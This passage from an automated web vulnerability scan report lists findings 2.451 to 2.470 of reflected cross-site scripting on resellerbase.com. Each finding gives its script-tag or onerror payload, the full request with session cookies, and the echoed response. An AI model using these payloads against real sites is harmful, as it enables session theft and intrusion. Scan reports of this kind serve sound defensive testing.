2.451. http://www.resellerbase.com/communication/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a10e<script>alert(1)</script>63c796b5737f1a7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication6a10e<script>alert(1)</script>63c796b5737f1a7b/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication6a10e<script>alert(1)</script>63c796b5737f1a7b/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.452. http://www.resellerbase.com/communication/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8fa67<script>alert(1)</script>06b38c1848d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/?8fa67<script>alert(1)</script>06b38c1848d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/?8fa67<script>alert(1)</script>06b38c1848d=1 was not found on this server.</p>
...[SNIP]...

2.453. http://www.resellerbase.com/communication/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload c0379<a>421c78b5937 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fc0379<a>421c78b5937 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fc0379<a>421c78b5937 was not found on this server.</p>
...[SNIP]...

2.454. http://www.resellerbase.com/communication/broadband/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f11c<script>alert(1)</script>77838febb8138d171 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication7f11c<script>alert(1)</script>77838febb8138d171/broadband/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication7f11c<script>alert(1)</script>77838febb8138d171/broadband/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.455. http://www.resellerbase.com/communication/broadband/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fd8d9<script>alert(1)</script>5382a1faec0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationfd8d9<script>alert(1)</script>5382a1faec0/broadband/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationfd8d9<script>alert(1)</script>5382a1faec0/broadband/ was not found on this server.</p>
...[SNIP]...

2.456. http://www.resellerbase.com/communication/broadband/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce98d<script>alert(1)</script>39d0b8f891d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbandce98d<script>alert(1)</script>39d0b8f891d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandce98d<script>alert(1)</script>39d0b8f891d/ was not found on this server.</p>
...[SNIP]...

2.457. http://www.resellerbase.com/communication/broadband/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b720b<script>alert(1)</script>97d5da902a738ed60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication/broadbandb720b<script>alert(1)</script>97d5da902a738ed60/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandb720b<script>alert(1)</script>97d5da902a738ed60/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.458. http://www.resellerbase.com/communication/broadband/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ec24b<script>alert(1)</script>0fff1cad6af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/?ec24b<script>alert(1)</script>0fff1cad6af=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/?ec24b<script>alert(1)</script>0fff1cad6af=1 was not found on this server.</p>
...[SNIP]...

2.459. http://www.resellerbase.com/communication/broadband/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 7b3d9<a>d1fb6b54770 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f7b3d9<a>d1fb6b54770 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f7b3d9<a>d1fb6b54770 was not found on this server.</p>
...[SNIP]...

2.460. http://www.resellerbase.com/communication/broadband/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47c72<script>alert(1)</script>855f7143ff7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication47c72<script>alert(1)</script>855f7143ff7/broadband/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication47c72<script>alert(1)</script>855f7143ff7/broadband/googlepr.php was not found on this server.</p>
...[SNIP]...

2.461. http://www.resellerbase.com/communication/broadband/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9683a<script>alert(1)</script>8b5797cf64b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband9683a<script>alert(1)</script>8b5797cf64b/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband9683a<script>alert(1)</script>8b5797cf64b/googlepr.php was not found on this server.</p>
...[SNIP]...

2.462. http://www.resellerbase.com/communication/broadband/googlepr.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1d460<script>alert(1)</script>f2be579353f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/googlepr.php1d460<script>alert(1)</script>f2be579353f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/googlepr.php1d460<script>alert(1)</script>f2be579353f was not found on this server.</p>
...[SNIP]...

2.463. http://www.resellerbase.com/communication/broadband/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload a0a42<a>e9df8fa8e68 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/googlepr.php?link_id=16a0a42<a>e9df8fa8e68 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/googlepr.php?link_id=16a0a42<a>e9df8fa8e68 was not found on this server.</p>
...[SNIP]...

2.464. http://www.resellerbase.com/communication/broadband/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 607c9<script>alert(1)</script>5adb138c79b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/googlepr.php?607c9<script>alert(1)</script>5adb138c79b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/googlepr.php?607c9<script>alert(1)</script>5adb138c79b=1 was not found on this server.</p>
...[SNIP]...

2.465. http://www.resellerbase.com/communication/broadband/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f71f2<script>alert(1)</script>36f1e4e39c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationf71f2<script>alert(1)</script>36f1e4e39c6/broadband/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationf71f2<script>alert(1)</script>36f1e4e39c6/broadband/search.php was not found on this server.</p>
...[SNIP]...

2.466. http://www.resellerbase.com/communication/broadband/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 508cb<script>alert(1)</script>6c30a75d6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband508cb<script>alert(1)</script>6c30a75d6a/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband508cb<script>alert(1)</script>6c30a75d6a/search.php was not found on this server.</p>
...[SNIP]...

2.467. http://www.resellerbase.com/communication/broadband/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b69d<script>alert(1)</script>6daeb9c6aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/search.php7b69d<script>alert(1)</script>6daeb9c6aa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/search.php7b69d<script>alert(1)</script>6daeb9c6aa was not found on this server.</p>
...[SNIP]...

2.468. http://www.resellerbase.com/communication/broadband/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload dda42<a>e2352e44e89 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/search.php?keyword=search...&Submit3=Searchdda42<a>e2352e44e89&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/search.php?keyword=search...&Submit3=Searchdda42<a>e2352e44e89&opt=2 was not found on this server.</p>
...[SNIP]...

2.469. http://www.resellerbase.com/communication/broadband/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/broadband/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c32"><img%20src%3da%20onerror%3dalert(1)>f951664db5d22ca20 was submitted in the cat parameter. This input was echoed as f2c32\"><img src=a onerror=alert(1)>f951664db5d22ca20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /communication/broadband/search.php?cat=15f2c32"><img%20src%3da%20onerror%3dalert(1)>f951664db5d22ca20&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/search.php?cat=15&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:36:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=15f2c32\"><img src=a onerror=alert(1)>f951664db5d22ca20">
...[SNIP]...

2.470. http://www.resellerbase.com/communication/broadband/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
